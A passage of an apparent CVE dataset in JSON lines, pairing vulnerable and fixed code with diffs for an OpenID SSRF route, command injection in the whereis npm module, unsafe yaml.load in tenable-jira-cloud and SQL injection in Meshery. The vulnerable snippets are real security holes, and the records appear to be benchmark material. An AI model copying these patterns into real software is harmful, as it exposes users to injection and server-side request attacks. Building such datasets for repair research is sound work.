authorization URL\n res.redirect(authorizationUrl)\n } catch (error) {\n Logger.error(`[Auth] Error in /auth/openid route: ${error}`)\n res.status(500).send('Internal Server Error')\n }\n })"}, {"id": "fix_js_241_2", "commit": "728496010cbfcee5b7b54001c9f79e02ede30d82", "file_path": "server/Auth.js", "start_line": 477, "end_line": 516, "snippet": " router.get('/auth/openid/config', this.isAuthenticated, async (req, res) => {\n if (!req.user.isAdminOrUp) {\n Logger.error(`[Auth] Non-admin user \"${req.user.username}\" attempted to get issuer config`)\n return res.sendStatus(403)\n }\n\n if (!req.query.issuer) {\n return res.status(400).send('Invalid request. Query param \\'issuer\\' is required')\n }\n\n // Strip trailing slash\n let issuerUrl = req.query.issuer\n if (issuerUrl.endsWith('/')) issuerUrl = issuerUrl.slice(0, -1)\n\n // Append config pathname and validate URL\n let configUrl = null\n try {\n configUrl = new URL(`${issuerUrl}/.well-known/openid-configuration`)\n if (!configUrl.pathname.endsWith('/.well-known/openid-configuration')) {\n throw new Error('Invalid pathname')\n }\n } catch (error) {\n Logger.error(`[Auth] Failed to get openid configuration. Invalid URL \"${configUrl}\"`, error)\n return res.status(400).send('Invalid request. Query param \\'issuer\\' is invalid')\n }\n\n axios.get(configUrl.toString()).then(({ data }) => {\n res.json({\n issuer: data.issuer,\n authorization_endpoint: data.authorization_endpoint,\n token_endpoint: data.token_endpoint,\n userinfo_endpoint: data.userinfo_endpoint,\n end_session_endpoint: data.end_session_endpoint,\n jwks_uri: data.jwks_uri\n })\n }).catch((error) => {\n Logger.error(`[Auth] Failed to get openid configuration at \"${configUrl}\"`, error)\n res.status(error.statusCode || 400).send(`${error.code || 'UNKNOWN'}: Failed to get openid configuration`)\n })\n })"}], "vul_patch": "--- a/server/Auth.js\n+++ b/server/Auth.js\n@@ -25,7 +25,7 @@\n if (req.query.redirect_uri) {\n // Check if the redirect_uri is in the whitelist\n if (Database.serverSettings.authOpenIDMobileRedirectURIs.includes(req.query.redirect_uri) ||\n- (Database.serverSettings.authOpenIDMobileRedirectURIs.length === 1 && Database.serverSettings.authOpenIDMobileRedirectURIs[0] === '*')) {\n+ (Database.serverSettings.authOpenIDMobileRedirectURIs.length === 1 && Database.serverSettings.authOpenIDMobileRedirectURIs[0] === '*')) {\n oidcStrategy._params.redirect_uri = new URL(`${protocol}://${req.get('host')}/auth/openid/mobile-redirect`).toString()\n mobile_redirect_uri = req.query.redirect_uri\n } else {\n\n--- a/server/Auth.js\n+++ b/server/Auth.js\n@@ -1,12 +1,30 @@\n- router.get('/auth/openid/config', async (req, res) => {\n+ router.get('/auth/openid/config', this.isAuthenticated, async (req, res) => {\n+ if (!req.user.isAdminOrUp) {\n+ Logger.error(`[Auth] Non-admin user \"${req.user.username}\" attempted to get issuer config`)\n+ return res.sendStatus(403)\n+ }\n+\n if (!req.query.issuer) {\n return res.status(400).send('Invalid request. 
Query param \\'issuer\\' is required')\n }\n+\n+ // Strip trailing slash\n let issuerUrl = req.query.issuer\n if (issuerUrl.endsWith('/')) issuerUrl = issuerUrl.slice(0, -1)\n \n- const configUrl = `${issuerUrl}/.well-known/openid-configuration`\n- axios.get(configUrl).then(({ data }) => {\n+ // Append config pathname and validate URL\n+ let configUrl = null\n+ try {\n+ configUrl = new URL(`${issuerUrl}/.well-known/openid-configuration`)\n+ if (!configUrl.pathname.endsWith('/.well-known/openid-configuration')) {\n+ throw new Error('Invalid pathname')\n+ }\n+ } catch (error) {\n+ Logger.error(`[Auth] Failed to get openid configuration. Invalid URL \"${configUrl}\"`, error)\n+ return res.status(400).send('Invalid request. Query param \\'issuer\\' is invalid')\n+ }\n+\n+ axios.get(configUrl.toString()).then(({ data }) => {\n res.json({\n issuer: data.issuer,\n authorization_endpoint: data.authorization_endpoint,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-3772", "cve_description": "Concatenating unsanitized user input in the `whereis` npm module < 0.4.1 allowed an attacker to execute arbitrary commands. The `whereis` module is deprecated and it is recommended to use the `which` npm module instead.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/vvo/node-whereis", "patch_url": ["https://github.com/vvo/node-whereis/commit/0f64e3780235004fb6e43bfd153ea3e0e210ee2b"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_17_1", "commit": "b8b642b", "file_path": "index.js", "start_line": 3, "end_line": 31, "snippet": "module.exports = function whereis(name, cb) {\n cp.exec('which ' + name, function(error, stdout, stderr) {\n stdout = stdout.split('\\n')[0];\n if (error || stderr || stdout === '' || stdout.charAt(0) !== '/') {\n stdout = stdout.split('\\n')[0];\n cp.exec('whereis ' + name, function(error, stdout, stderr) {\n if (error || stderr || stdout === '' || stdout.indexOf( '/' ) === -1) {\n cp.exec('where ' + name, function (error, stdout, stderr) { //windows\n if (error || stderr || stdout === '' || stdout.indexOf('\\\\') === -1) {\n cp.exec('for %i in (' + name + '.exe) do @echo. 
%~$PATH:i', function (error, stdout, stderr) { //windows xp\n if (error || stderr || stdout === '' || stdout.indexOf('\\\\') === -1) {\n return cb(new Error('Could not find ' + name + ' on your system'));\n }\n return cb(null, stdout);\n });\n } else {\n return cb(null, stdout);\n }\n });\n }\n else {\n return cb(null, stdout.split(' ')[1]);\n }\n });\n } else {\n return cb(null, stdout);\n }\n });\n};"}], "fix_func": [{"id": "fix_js_17_1", "commit": "0f64e37", "file_path": "index.js", "start_line": 3, "end_line": 31, "snippet": "module.exports = function whereis(name, cb) {\n cp.execFile('which', [name], function(error, stdout, stderr) {\n stdout = stdout.split('\\n')[0];\n if (error || stderr || stdout === '' || stdout.charAt(0) !== '/') {\n stdout = stdout.split('\\n')[0];\n cp.execFile('whereis', [name], function(error, stdout, stderr) {\n if (error || stderr || stdout === '' || stdout.indexOf( '/' ) === -1) {\n cp.execFile('where', [name], function (error, stdout, stderr) { //windows\n if (error || stderr || stdout === '' || stdout.indexOf('\\\\') === -1) {\n cp.exec('for %i in (' + name + '.exe) do @echo. %~$PATH:i', function (error, stdout, stderr) { //windows xp\n if (error || stderr || stdout === '' || stdout.indexOf('\\\\') === -1) {\n return cb(new Error('Could not find ' + name + ' on your system'));\n }\n return cb(null, stdout);\n });\n } else {\n return cb(null, stdout);\n }\n });\n }\n else {\n return cb(null, stdout.split(' ')[1]);\n }\n });\n } else {\n return cb(null, stdout);\n }\n });\n};"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,11 +1,11 @@\n module.exports = function whereis(name, cb) {\n- cp.exec('which ' + name, function(error, stdout, stderr) {\n+ cp.execFile('which', [name], function(error, stdout, stderr) {\n stdout = stdout.split('\\n')[0];\n if (error || stderr || stdout === '' || stdout.charAt(0) !== '/') {\n stdout = stdout.split('\\n')[0];\n- cp.exec('whereis ' + name, function(error, stdout, stderr) {\n+ cp.execFile('whereis', [name], function(error, stdout, stderr) {\n if (error || stderr || stdout === '' || stdout.indexOf( '/' ) === -1) {\n- cp.exec('where ' + name, function (error, stdout, stderr) { //windows\n+ cp.execFile('where', [name], function (error, stdout, stderr) { //windows\n if (error || stderr || stdout === '' || stdout.indexOf('\\\\') === -1) {\n cp.exec('for %i in (' + name + '.exe) do @echo. %~$PATH:i', function (error, stdout, stderr) { //windows xp\n if (error || stderr || stdout === '' || stdout.indexOf('\\\\') === -1) {\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2018-3772:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/node-whereis\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": null} {"cve_id": "CVE-2021-21371", "cve_description": "Tenable for Jira Cloud is an open source project designed to pull Tenable.io vulnerability data, then generate Jira Tasks and sub-tasks based on the vulnerabilities' current state. It published in pypi as \"tenable-jira-cloud\". In tenable-jira-cloud before version 1.1.21, it is possible to run arbitrary commands through the yaml.load() method. This could allow an attacker with local access to the host to run arbitrary code by running the application with a specially crafted YAML configuration file. 
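For the yaml.load() issue described in this tenable-jira-cloud record, the loader choice is the whole story: yaml.Loader constructs arbitrary Python objects from tags such as !!python/object/apply, which is how a crafted configuration file reaches os.system, while yaml.safe_load() builds only plain scalars, sequences, and mappings and raises on such tags. A small demonstration; the payload is shown but deliberately never passed to the unsafe loader:

import yaml

payload = '!!python/object/apply:os.system ["id"]'

try:
    # safe_load has no constructor for python/* tags, so this raises.
    yaml.safe_load(payload)
except yaml.YAMLError as exc:
    print("rejected:", exc)

# yaml.load(payload, Loader=yaml.Loader) would instead call os.system("id").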
This is fixed in version 1.1.21 by using yaml.safe_load() instead of yaml.load().", "cwe_info": {"CWE-502": {"name": "Deserialization of Untrusted Data", "description": "The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid."}}, "repo": "https://github.com/tenable/integration-jira-cloud", "patch_url": ["https://github.com/tenable/integration-jira-cloud/commit/f8c2095fd529e664e7fa25403a0a4a85bb3907d0"], "programing_language": "Python", "vul_func": [{"id": "vul_py_77_1", "commit": "fa838db", "file_path": "tenable_jira/cli.py", "start_line": "59", "end_line": "231", "snippet": "def cli(configfile, observed_since, setup_only=False, troubleshoot=False):\n '''\n Tenable.io -> Jira Cloud Transformer & Ingester\n '''\n # Load the config, but ensure that any additional fields are additive to the\n # basic field set.\n config_from_file = yaml.load(configfile, Loader=yaml.Loader)\n fields = config_from_file.pop('custom_fields', list())\n config = dict_merge(base_config(), config_from_file)\n config['fields'] = config['fields'] + fields\n\n if config['tenable'].get('tio_transform_tags'):\n attr_cache = config['tenable'].get('tio_asset_attr_cache', list())\n tag_attrs = config['tenable'].get('tio_transform_tags', list())\n config['tenable']['tio_asset_attr_cache'] = attr_cache + tag_attrs\n\n\n # Get the logging definition and define any defaults as need be.\n log = config.get('log', {})\n log_lvls = {'debug': 10, 'info': 20, 'warn': 30, 'error': 40}\n log['level'] = log_lvls[log.get('level', 'warn')]\n log['format'] = log.get('format',\n '%(asctime)-15s %(name)s %(levelname)s %(message)s')\n\n # Configure the root logging facility\n if troubleshoot:\n logging.basicConfig(\n level=logging.DEBUG,\n format=log['format'],\n filename='tenable_debug.log'\n )\n else:\n logging.basicConfig(**log)\n\n # Output some basic information detailing the config file used and the\n # python version & system arch.\n logging.info('Tenable2JiraCloud Version {}'.format(__version__))\n logging.info('Using configuration file {}'.format(configfile.name))\n uname = platform.uname()\n logging.info('Running on Python {} {}/{}'.format(\n '.'.join([str(i) for i in sys.version_info][0:3]),\n uname[0], uname[-2]))\n\n # instantiate the Jira object\n jira = Jira(\n 'https://{}/rest/api/3'.format(config['jira']['address']),\n config['jira']['api_username'],\n config['jira']['api_token']\n )\n\n # Initiate the Tenable.io API model, the Ingester model, and start the\n # ingestion and data transformation.\n if config['tenable'].get('platform') == 'tenable.io':\n if not observed_since:\n # if no since field is supplied, then look in the config file to see\n # if an age was applied, if not, then use the default of 30 days.\n observed_since = arrow.now()\\\n .shift(days=-config['tenable'].get('tio_age', 30))\\\n .floor('day').timestamp()\n\n source = TenableIO(\n access_key=config['tenable'].get('access_key'),\n secret_key=config['tenable'].get('secret_key'),\n vendor='Tenable',\n product='JiraCloud',\n build=__version__\n )\n if int(source.session.details().get('permissions')) < 64:\n logging.error('API Keys tie to non-admin user.')\n elif config['tenable'].get('platform') == 'tenable.sc':\n source = TenableSC(\n config['tenable'].get('address'),\n port=int(config['tenable'].get('port', 443)),\n username=config['tenable'].get('username'),\n password=config['tenable'].get('password'),\n access_key=config['tenable'].get('access_key'),\n secret_key=config['tenable'].get('secret_key'),\n 
vendor='Tenable',\n product='JiraCloud',\n build=__version__\n )\n else:\n logging.error('No valid Tenable platform configuration defined.')\n exit(1)\n ingest = Tio2Jira(source, jira, config)\n\n if troubleshoot:\n # if the troubleshooting flag is set, then we will be collecting some\n # basic information and outputting it to the screen in a format that\n # Github issues would expect to format it all pretty. This should help\n # reduce the amount of time that is spent with back-and-forth debugging.\n try:\n ingest.ingest(int(observed_since))\n except:\n logging.exception('Caught the following Exception')\n\n # Some basic redaction of sensitive data, such as API Keys, Usernames,\n # Passwords, and hostnames.\n addr = config_from_file['jira']['address']\n sc_addr = 'NOTHING_TO_SEE_HERE_AT_ALL'\n config_from_file['jira']['address'] = ''\n config_from_file['jira']['api_token'] = ''\n config_from_file['jira']['api_username'] = ''\n config_from_file['project']['leadAccountId'] = ''\n if config_from_file['tenable'].get('address'):\n sc_addr = config_from_file['tenable']['address']\n config_from_file['tenable']['address'] = ''\n if config_from_file['tenable'].get('access_key'):\n config_from_file['tenable']['access_key'] = ''\n if config_from_file['tenable'].get('secret_key'):\n config_from_file['tenable']['secret_key'] = ''\n if config_from_file['tenable'].get('username'):\n config_from_file['tenable']['username'] = ''\n if config_from_file['tenable'].get('password'):\n config_from_file['tenable']['password'] = ''\n\n output = troubleshooting.format(\n configfile=yaml.dump(config_from_file, default_flow_style=False),\n logging=open('tenable_debug.log').read() \\\n .replace(addr, '') \\\n .replace(sc_addr, ''),\n issuetypes='\\n'.join(\n [\n '{id}: {name}'.format(**a)\n for a in jira.issue_types.list()\n if a.get('name').lower() in ['task', 'subtask', 'sub-task']\n ]\n )\n )\n print(output)\n print('\\n'.join([\n '/-------------------------------NOTICE-----------------------------------\\\\',\n '| The output above is helpful for us to troubleshoot exactly what is |',\n '| happening within the code and offer a diagnosis for how to correct. |',\n '| Please note that while some basic redaction has already been performed |',\n '| that we ask you to review the information you\\'re about to send and |',\n '| ensure that nothing deemed sensitive is transmitted. 
|',\n '| ---------------------------------------------------------------------- |',\n '| -- Copy of output saved to \"issue_debug.md\" |',\n '\\\\------------------------------------------------------------------------/'\n ]))\n with open('issue_debug.md', 'w') as reportfile:\n print(output, file=reportfile)\n os.remove('tenable_debug.log')\n elif not setup_only:\n ingest.ingest(observed_since)\n\n # If we are expected to continually re-run the transformer, then we will\n # need to track the passage of time and run every X hours, where X is\n # defined by the user in the configuration.\n if config.get('service', {}).get('interval', 0) > 0:\n sleeper = int(config['service']['interval']) * 3600\n while True:\n last_run = int(time.time())\n logging.info(\n 'Sleeping for {}h'.format(sleeper/3600))\n time.sleep(sleeper)\n logging.info(\n 'Initiating ingest with observed_since={}'.format(last_run))\n ingest.ingest(last_run)\n elif setup_only:\n # In setup-only mode, the ingest will not run, and instead a config file\n # will be generated that will have all of the JIRA identifiers baked in\n # and will also inform the integration to ignore the screen builder.\n # When using this config, if there are any changes to the code, then\n # this config will need to be re-generated.\n config['screen']['no_create'] = True\n logging.info('Set to setup-only. Will not run ingest.')\n logging.info('The following is the updated config file from the setup.')\n with open('generated_config.yaml', 'w') as outfile:\n outfile.write(yaml.dump(config, Dumper=yaml.Dumper))\n logging.info('Generated \"generated_config.yaml\" config file.')\n logging.info('This config file should be updated for every new version of this integration.')"}], "fix_func": [{"id": "fix_py_77_1", "commit": "f8c2095", "file_path": "tenable_jira/cli.py", "start_line": "59", "end_line": "231", "snippet": "def cli(configfile, observed_since, setup_only=False, troubleshoot=False):\n '''\n Tenable.io -> Jira Cloud Transformer & Ingester\n '''\n # Load the config, but ensure that any additional fields are additive to the\n # basic field set.\n config_from_file = yaml.safe_load(configfile)\n fields = config_from_file.pop('custom_fields', list())\n config = dict_merge(base_config(), config_from_file)\n config['fields'] = config['fields'] + fields\n\n if config['tenable'].get('tio_transform_tags'):\n attr_cache = config['tenable'].get('tio_asset_attr_cache', list())\n tag_attrs = config['tenable'].get('tio_transform_tags', list())\n config['tenable']['tio_asset_attr_cache'] = attr_cache + tag_attrs\n\n\n # Get the logging definition and define any defaults as need be.\n log = config.get('log', {})\n log_lvls = {'debug': 10, 'info': 20, 'warn': 30, 'error': 40}\n log['level'] = log_lvls[log.get('level', 'warn')]\n log['format'] = log.get('format',\n '%(asctime)-15s %(name)s %(levelname)s %(message)s')\n\n # Configure the root logging facility\n if troubleshoot:\n logging.basicConfig(\n level=logging.DEBUG,\n format=log['format'],\n filename='tenable_debug.log'\n )\n else:\n logging.basicConfig(**log)\n\n # Output some basic information detailing the config file used and the\n # python version & system arch.\n logging.info('Tenable2JiraCloud Version {}'.format(__version__))\n logging.info('Using configuration file {}'.format(configfile.name))\n uname = platform.uname()\n logging.info('Running on Python {} {}/{}'.format(\n '.'.join([str(i) for i in sys.version_info][0:3]),\n uname[0], uname[-2]))\n\n # instantiate the Jira object\n jira = Jira(\n 
'https://{}/rest/api/3'.format(config['jira']['address']),\n config['jira']['api_username'],\n config['jira']['api_token']\n )\n\n # Initiate the Tenable.io API model, the Ingester model, and start the\n # ingestion and data transformation.\n if config['tenable'].get('platform') == 'tenable.io':\n if not observed_since:\n # if no since field is supplied, then look in the config file to see\n # if an age was applied, if not, then use the default of 30 days.\n observed_since = arrow.now()\\\n .shift(days=-config['tenable'].get('tio_age', 30))\\\n .floor('day').timestamp()\n\n source = TenableIO(\n access_key=config['tenable'].get('access_key'),\n secret_key=config['tenable'].get('secret_key'),\n vendor='Tenable',\n product='JiraCloud',\n build=__version__\n )\n if int(source.session.details().get('permissions')) < 64:\n logging.error('API Keys tie to non-admin user.')\n elif config['tenable'].get('platform') == 'tenable.sc':\n source = TenableSC(\n config['tenable'].get('address'),\n port=int(config['tenable'].get('port', 443)),\n username=config['tenable'].get('username'),\n password=config['tenable'].get('password'),\n access_key=config['tenable'].get('access_key'),\n secret_key=config['tenable'].get('secret_key'),\n vendor='Tenable',\n product='JiraCloud',\n build=__version__\n )\n else:\n logging.error('No valid Tenable platform configuration defined.')\n exit(1)\n ingest = Tio2Jira(source, jira, config)\n\n if troubleshoot:\n # if the troubleshooting flag is set, then we will be collecting some\n # basic information and outputting it to the screen in a format that\n # Github issues would expect to format it all pretty. This should help\n # reduce the amount of time that is spent with back-and-forth debugging.\n try:\n ingest.ingest(int(observed_since))\n except:\n logging.exception('Caught the following Exception')\n\n # Some basic redaction of sensitive data, such as API Keys, Usernames,\n # Passwords, and hostnames.\n addr = config_from_file['jira']['address']\n sc_addr = 'NOTHING_TO_SEE_HERE_AT_ALL'\n config_from_file['jira']['address'] = ''\n config_from_file['jira']['api_token'] = ''\n config_from_file['jira']['api_username'] = ''\n config_from_file['project']['leadAccountId'] = ''\n if config_from_file['tenable'].get('address'):\n sc_addr = config_from_file['tenable']['address']\n config_from_file['tenable']['address'] = ''\n if config_from_file['tenable'].get('access_key'):\n config_from_file['tenable']['access_key'] = ''\n if config_from_file['tenable'].get('secret_key'):\n config_from_file['tenable']['secret_key'] = ''\n if config_from_file['tenable'].get('username'):\n config_from_file['tenable']['username'] = ''\n if config_from_file['tenable'].get('password'):\n config_from_file['tenable']['password'] = ''\n\n output = troubleshooting.format(\n configfile=yaml.dump(config_from_file, default_flow_style=False),\n logging=open('tenable_debug.log').read() \\\n .replace(addr, '') \\\n .replace(sc_addr, ''),\n issuetypes='\\n'.join(\n [\n '{id}: {name}'.format(**a)\n for a in jira.issue_types.list()\n if a.get('name').lower() in ['task', 'subtask', 'sub-task']\n ]\n )\n )\n print(output)\n print('\\n'.join([\n '/-------------------------------NOTICE-----------------------------------\\\\',\n '| The output above is helpful for us to troubleshoot exactly what is |',\n '| happening within the code and offer a diagnosis for how to correct. 
|',\n '| Please note that while some basic redaction has already been performed |',\n '| that we ask you to review the information you\\'re about to send and |',\n '| ensure that nothing deemed sensitive is transmitted. |',\n '| ---------------------------------------------------------------------- |',\n '| -- Copy of output saved to \"issue_debug.md\" |',\n '\\\\------------------------------------------------------------------------/'\n ]))\n with open('issue_debug.md', 'w') as reportfile:\n print(output, file=reportfile)\n os.remove('tenable_debug.log')\n elif not setup_only:\n ingest.ingest(observed_since)\n\n # If we are expected to continually re-run the transformer, then we will\n # need to track the passage of time and run every X hours, where X is\n # defined by the user in the configuration.\n if config.get('service', {}).get('interval', 0) > 0:\n sleeper = int(config['service']['interval']) * 3600\n while True:\n last_run = int(time.time())\n logging.info(\n 'Sleeping for {}h'.format(sleeper/3600))\n time.sleep(sleeper)\n logging.info(\n 'Initiating ingest with observed_since={}'.format(last_run))\n ingest.ingest(last_run)\n elif setup_only:\n # In setup-only mode, the ingest will not run, and instead a config file\n # will be generated that will have all of the JIRA identifiers baked in\n # and will also inform the integration to ignore the screen builder.\n # When using this config, if there are any changes to the code, then\n # this config will need to be re-generated.\n config['screen']['no_create'] = True\n logging.info('Set to setup-only. Will not run ingest.')\n logging.info('The following is the updated config file from the setup.')\n with open('generated_config.yaml', 'w') as outfile:\n outfile.write(yaml.dump(config, Dumper=yaml.Dumper))\n logging.info('Generated \"generated_config.yaml\" config file.')\n logging.info('This config file should be updated for every new version of this integration.')"}], "vul_patch": "--- a/tenable_jira/cli.py\n+++ b/tenable_jira/cli.py\n@@ -4,7 +4,7 @@\n '''\n # Load the config, but ensure that any additional fields are additive to the\n # basic field set.\n- config_from_file = yaml.load(configfile, Loader=yaml.Loader)\n+ config_from_file = yaml.safe_load(configfile)\n fields = config_from_file.pop('custom_fields', list())\n config = dict_merge(base_config(), config_from_file)\n config['fields'] = config['fields'] + fields\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-35181", "cve_description": "Meshery is an open source, cloud native manager that enables the design and management of Kubernetes-based infrastructure and applications. A SQL injection vulnerability in Meshery prior to version 0.7.22 may lead to arbitrary file write by using a SQL injection stacked queries payload, and the ATTACH DATABASE command. Additionally, attackers may be able to access and modify any data stored in the database, like performance profiles (which may contain session cookies), Meshery application data, or any Kubernetes configuration added to the system. The Meshery project exposes the function `GetMeshSyncResourcesKinds` at the API URL `/api/system/meshsync/resources/kinds`. The order query parameter is directly used to build a SQL query in `meshync_handler.go`. 
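The Meshery fix shown below routes the order/SortOn inputs through a SanitizeOrderInput allow-list, because an ORDER BY column name is an identifier and cannot be bound as a query placeholder; it must be matched against a fixed set rather than interpolated. A Python sketch of the same idea, reusing the column names from the Go fix; the function name mirrors the patch but the code itself is illustrative:

ALLOWED_ORDER_COLUMNS = {"created_at", "updated_at", "name"}

def sanitize_order_input(column, default="updated_at"):
    # Anything not in the allow-list falls back to a known-safe column,
    # so stacked-query payloads never reach the SQL string.
    return column if column in ALLOWED_ORDER_COLUMNS else default

print(sanitize_order_input("name"))                           # -> name
print(sanitize_order_input('kind"; ATTACH DATABASE x AS y'))  # -> updated_at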
Version 0.7.22 fixes this issue.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/meshery/meshery", "patch_url": ["https://github.com/meshery/meshery/commit/b55f6064d0c6a965aee38f30281f99da7dc4420c", "https://github.com/meshery/meshery/commit/8e995ce21af02d32ef61689c1e1748a745917f13"], "programing_language": "Go", "vul_func": [{"id": "vul_go_278_1", "commit": "c54bc36cbffd82732528ee4eb911616535ebe3ed", "file_path": "mesheryctl/pkg/utils/helpers.go", "start_line": 544, "end_line": 551, "snippet": "func ClearLine() {\n\tclearCmd := exec.Command(\"clear\") // for UNIX-like systems\n\tif runtime.GOOS == \"windows\" {\n\t\tclearCmd = exec.Command(\"cmd\", \"/c\", \"cls\") // for Windows\n\t}\n\tclearCmd.Stdout = os.Stdout\n\t_ = clearCmd.Run()\n}"}, {"id": "vul_go_278_2", "commit": "c54bc36cbffd82732528ee4eb911616535ebe3ed", "file_path": "server/handlers/meshsync_handler.go", "start_line": 187, "end_line": 254, "snippet": "func (h *Handler) GetMeshSyncResourcesKinds(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {\n\trw.Header().Set(\"Content-Type\", \"application/json\")\n\tenc := json.NewEncoder(rw)\n\n\tpage, offset, limit,\n\t\tsearch, order, sort, _ := getPaginationParams(r)\n\n\tfilter := struct {\n\t\tClusterIds []string `json:\"clusterIds\"`\n\t}{}\n\n\tvar kinds []string\n\tvar totalCount int64\n\n\tclusterIds := r.URL.Query().Get(\"clusterIds\")\n\tif clusterIds != \"\" {\n\t\terr := json.Unmarshal([]byte(clusterIds), &filter.ClusterIds)\n\t\tif err != nil {\n\t\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tfilter.ClusterIds = []string{}\n\t}\n\n\tresult := provider.GetGenericPersister().Model(&model.KubernetesResource{}).Distinct(\"kind\").\n\t\tWhere(\"kubernetes_resources.cluster_id IN (?)\", filter.ClusterIds)\n\n\tif search != \"\" {\n\t\tresult = result.Where(\"kubernetes_resources.kind LIKE ?\", \"%\"+search+\"%\")\n\t}\n\n\tif limit != 0 {\n\t\tresult = result.Limit(limit)\n\t}\n\n\tif offset != 0 {\n\t\tresult = result.Offset(offset)\n\t}\n\n\tif order != \"\" {\n\t\tif sort == \"desc\" {\n\t\t\tresult = result.Order(clause.OrderByColumn{Column: clause.Column{Name: order}, Desc: true})\n\t\t} else {\n\t\t\tresult = result.Order(order)\n\t\t}\n\t}\n\n\terr := result.Pluck(\"kinds\", &kinds).Error\n\tif err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tresponse := &models.MeshSyncResourcesKindsAPIResponse{\n\t\tKinds: kinds,\n\t\tTotalCount: totalCount,\n\t\tPage: page,\n\t\tPageSize: limit,\n\t}\n\n\tif err := enc.Encode(response); err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t}\n}"}, {"id": 
"vul_go_278_3", "commit": "c54bc36cbffd82732528ee4eb911616535ebe3ed", "file_path": "server/models/events_persister.go", "start_line": 47, "end_line": 105, "snippet": "func (e *EventsPersister) GetAllEvents(eventsFilter *events.EventsFilter, userID uuid.UUID) (*EventsResponse, error) {\n\teventsDB := []*events.Event{}\n\tfinder := e.DB.Model(&events.Event{}).Where(\"user_id = ?\", userID)\n\n\tif len(eventsFilter.Category) != 0 {\n\t\tfinder = finder.Where(\"category IN ?\", eventsFilter.Category)\n\t}\n\n\tif len(eventsFilter.Action) != 0 {\n\t\tfinder = finder.Where(\"action IN ?\", eventsFilter.Action)\n\t}\n\n\tif len(eventsFilter.Severity) != 0 {\n\t\tfinder = finder.Where(\"severity IN ?\", eventsFilter.Severity)\n\t}\n\n\tif eventsFilter.Search != \"\" {\n\t\tfinder = finder.Where(\"description LIKE ?\", \"%\"+eventsFilter.Search+\"%\")\n\t}\n\n\tif eventsFilter.Status != \"\" {\n\t\tfinder = finder.Where(\"status = ?\", eventsFilter.Status)\n\t}\n\n\tif eventsFilter.Order == \"asc\" {\n\t\tfinder = finder.Order(eventsFilter.SortOn)\n\t} else {\n\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: eventsFilter.SortOn}, Desc: true})\n\t}\n\n\tvar count int64\n\tfinder.Count(&count)\n\n\tif eventsFilter.Offset != 0 {\n\t\tfinder = finder.Offset(eventsFilter.Offset)\n\t}\n\n\tif eventsFilter.Limit != 0 {\n\t\tfinder = finder.Limit(eventsFilter.Limit)\n\t}\n\n\terr := finder.Scan(&eventsDB).Error\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcountBySeverity, err := e.getCountBySeverity(userID, eventsFilter.Status)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &EventsResponse{\n\t\tEvents: eventsDB,\n\t\tPageSize: eventsFilter.Limit,\n\t\tTotalCount: count,\n\t\tCountBySeverityLevel: countBySeverity,\n\t}, nil\n}"}], "fix_func": [{"id": "fix_go_278_1", "commit": "b55f6064d0c6a965aee38f30281f99da7dc4420c", "file_path": "mesheryctl/pkg/utils/helpers.go", "start_line": 544, "end_line": 554, "snippet": "func ClearLine() {\n\tclearCmd := exec.Command(\"clear\") // for UNIX-like systems\n\tif runtime.GOOS == \"windows\" {\n\t\tclearCmd = exec.Command(\"cmd\", \"/c\", \"cls\") // for Windows\n\t}\n\tclearCmd.Stdout = os.Stdout\n\terr := clearCmd.Run()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}"}, {"id": "fix_go_278_2", "commit": "b55f6064d0c6a965aee38f30281f99da7dc4420c", "file_path": "server/handlers/meshsync_handler.go", "start_line": 187, "end_line": 255, "snippet": "func (h *Handler) GetMeshSyncResourcesKinds(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {\n\trw.Header().Set(\"Content-Type\", \"application/json\")\n\tenc := json.NewEncoder(rw)\n\n\tpage, offset, limit,\n\t\tsearch, order, sort, _ := getPaginationParams(r)\n\n\tfilter := struct {\n\t\tClusterIds []string `json:\"clusterIds\"`\n\t}{}\n\n\tvar kinds []string\n\tvar totalCount int64\n\n\tclusterIds := r.URL.Query().Get(\"clusterIds\")\n\tif clusterIds != \"\" 